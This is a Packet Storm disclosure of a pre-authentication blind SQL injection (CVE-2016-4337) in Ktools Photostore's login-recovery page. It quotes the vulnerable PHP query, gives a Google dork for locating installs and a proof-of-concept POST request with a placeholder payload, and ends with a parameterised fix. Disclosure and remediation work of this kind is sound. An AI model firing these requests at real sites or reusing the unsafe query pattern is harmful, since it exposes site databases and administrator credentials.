Packet Storm ID: PACKETSTORM:137734
Ktools Photostore 4.7.5 Blind SQL Injection

2016-06-30 00:00:00
Viktor Minin
packetstormsecurity.com
37

EPSS: 0.002
Percentile: 56.5%

```
Title : Ktools Photostore <= 4.7.5 (Pre-Authentication) Blind SQL Injection
CVE-ID : CVE-2016-4337
Google Dork: inurl:mgr.login.php
Product : Photostore
Affected : Versions prior to 4.7.5
Impact : Critical
Remote : Yes
Website link: http://www.ktools.net
Reported : 02/06/2016
Authors : Gal Goldshtein and Viktor Minin
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
No authentication (login) is required to exploit this vulnerability.
The Photostore application password recovery module is prone to a blind SQL injection attack.
An attacker can exploit this vulnerability to retrieve all the data stored in the application's database.


Vulnerable code is located in the mgr.login.php file:

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
case 'recover_login': {
    // The unauthenticated $_POST['email'] value is concatenated straight into the
    // SQL string with no escaping or parameter binding: this is the injection point.
    $result = mysqli_query( $db, 'SELECT username,password,email,admin_id FROM ' . $dbinfo['pre'] . 'admins where email = \'' . $_POST['email'] . '\'' );
    // Only the row count and first row are used, so nothing is echoed back and the
    // injection is blind (observable through true/false or timing differences).
    $returned_rows = mysqli_num_rows( $result );
    $db_admin_user = mysqli_fetch_array( $result );
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

PoC:
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
POST /photostore/manager/mgr.login.php?pmode=recover_login HTTP/1.1
Host: victim.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server/photostore/manager/mgr.login.php?username=demo&password=demo
Cookie: member[umem_id]=58C05864CA6A59DBGHJSKDHGDGS770D5; PHPSESSID=30afayreighgfdgucb0d2b0c6dece3158
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9

email=%27%20[SQL PAYLOAD];#
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
```
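The hardened form of the recover_login lookup quoted in the advisory, written here as an added example and not taken from a Ktools patch: the `$db` connection, the `$dbinfo['pre']` table prefix and the column names come from the vulnerable snippet, while the function name, the email validation and the prefix whitelist are assumptions.

```php
<?php
// Added example: parameterised replacement for the recover_login branch.
// Assumes $db is an open mysqli connection (mysqlnd, so get_result() is
// available) and $dbinfo['pre'] is the configured table prefix.
function recover_login(mysqli $db, array $dbinfo, string $email): ?array
{
    // Reject anything that is not a syntactically valid address before it
    // is used at all; this is defence in depth, not the actual fix.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null;
    }
    // The prefix is configuration, not request data, but it is spliced into
    // the query text where a bound parameter cannot go, so it is whitelisted.
    if (!preg_match('/^[A-Za-z0-9_]*$/', $dbinfo['pre'])) {
        throw new RuntimeException('invalid table prefix');
    }
    $sql = 'SELECT username,password,email,admin_id FROM '
         . $dbinfo['pre'] . 'admins WHERE email = ? LIMIT 1';

    // The address travels as a bound parameter: the server parses the
    // statement before the value is supplied, so a quote or comment marker
    // in $email can no longer change the query structure.
    $stmt = $db->prepare($sql);
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $stmt->bind_param('s', $email);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();

    return $row ?: null;
}
```

The caller should produce the same response whether or not a row came back, so that the recovery form does not become an account-enumeration oracle once the injection is closed.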